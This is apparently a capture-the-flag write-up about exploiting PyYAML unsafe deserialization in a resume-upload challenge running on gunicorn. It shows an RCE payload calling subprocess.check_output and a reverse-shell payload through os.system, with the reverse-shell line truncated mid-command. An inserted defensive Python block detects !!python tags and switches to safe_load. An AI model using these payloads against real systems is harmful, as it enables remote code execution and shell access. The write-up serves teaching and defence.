Tags: deserialization pyyaml 

Rating: 3.0


Writing your resume in Word is for rookies.
Real programmers use YAML.

## Enumeration

```
< HTTP/1.1 200 OK
< server: gunicorn/20.0.4
```

gunicorn is a Python WSGI HTTP server.

So we can assume that the YAML parser behind the upload is implemented in Python, and the most commonly used Python YAML library is PyYAML.

`yaml.load()` with `Loader=yaml.UnsafeLoader` (or the full `Loader`, which was the default before PyYAML 5.1) constructs arbitrary Python objects from `!!python/*` tags, which leads to RCE.

More info: https://net-square.com/yaml-deserialization-attack-in-python.html


Let us pass our malicious serialized payload in a field whose value is reflected back in the response.

`!!python/object/apply:subprocess.check_output ["ls"]`
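As an added defender-side example (not part of the original writeup), here is a pre-parse check for the `!!python/` tags that `yaml.load()` with `UnsafeLoader` would execute, placed beside the actual fix, `yaml.safe_load()`. The `find_python_tags`/`load_untrusted` names and the two sample resume documents are my own constructions.

```python
"""Spot PyYAML code-execution tags in untrusted input and parse it safely."""
import re
from typing import List, Tuple

try:
    import yaml  # PyYAML; safe_load is the real fix, the scan below is a detection signal
except ImportError:  # keep the tag scanner usable even without PyYAML installed
    yaml = None

# Tags that yaml.load()/UnsafeLoader resolve to arbitrary Python callables.
# Covers the !!python/ shorthand and the verbose !<tag:yaml.org,2002:python/...> form.
DANGEROUS_TAG = re.compile(
    r"(?:!!python/|!<tag:yaml\.org,2002:python/)(?:object(?:/apply|/new)?|name|module)"
)

def find_python_tags(yaml_text: str) -> List[Tuple[int, str]]:
    """Return (line_number, tag_text) for every Python object tag in the document."""
    hits = []
    for lineno, line in enumerate(yaml_text.splitlines(), start=1):
        hits.extend((lineno, m.group(0)) for m in DANGEROUS_TAG.finditer(line))
    return hits

def load_untrusted(yaml_text: str):
    """Parse YAML from an untrusted source (e.g. an uploaded resume).

    The pre-scan refuses documents carrying Python object tags, which is the event
    worth logging or alerting on. yaml.safe_load then builds only plain YAML types
    and raises ConstructorError on any such tag anyway, so the parse never reaches
    subprocess/os even if the regex is bypassed.
    """
    tags = find_python_tags(yaml_text)
    if tags:
        raise ValueError(f"refusing YAML with Python object tags: {tags}")
    if yaml is None:
        raise RuntimeError("PyYAML is not installed")
    return yaml.safe_load(yaml_text)

def is_rejected(yaml_text: str) -> bool:
    """True if load_untrusted refuses the document because of its tags."""
    try:
        load_untrusted(yaml_text)
    except ValueError:
        return True
    return False

# Constructed samples: a harmless resume and the payload shown in the writeup.
BENIGN_RESUME = "name: Jane Doe\nskills:\n  - python\n  - yaml\n"
MALICIOUS_RESUME = 'name: !!python/object/apply:subprocess.check_output ["ls"]\n'

if __name__ == "__main__":
    print(find_python_tags(MALICIOUS_RESUME))  # [(1, '!!python/object/apply')]
    print(is_rejected(MALICIOUS_RESUME), is_rejected(BENIGN_RESUME))  # True False
```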



We have achieved RCE, but we are still unable to read the contents of the flag.

Let's try for a reverse shell.

```
!!python/object/apply:os.system ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_ST
n/sh","-i"]);' "]
```

I have created an auto-exploit tool for this challenge; check my GitHub.

[GitHub - ZyperX/AppSec-IL-Resume.yml](https://github.com/ZyperX/AppSec-IL-Resume.yml)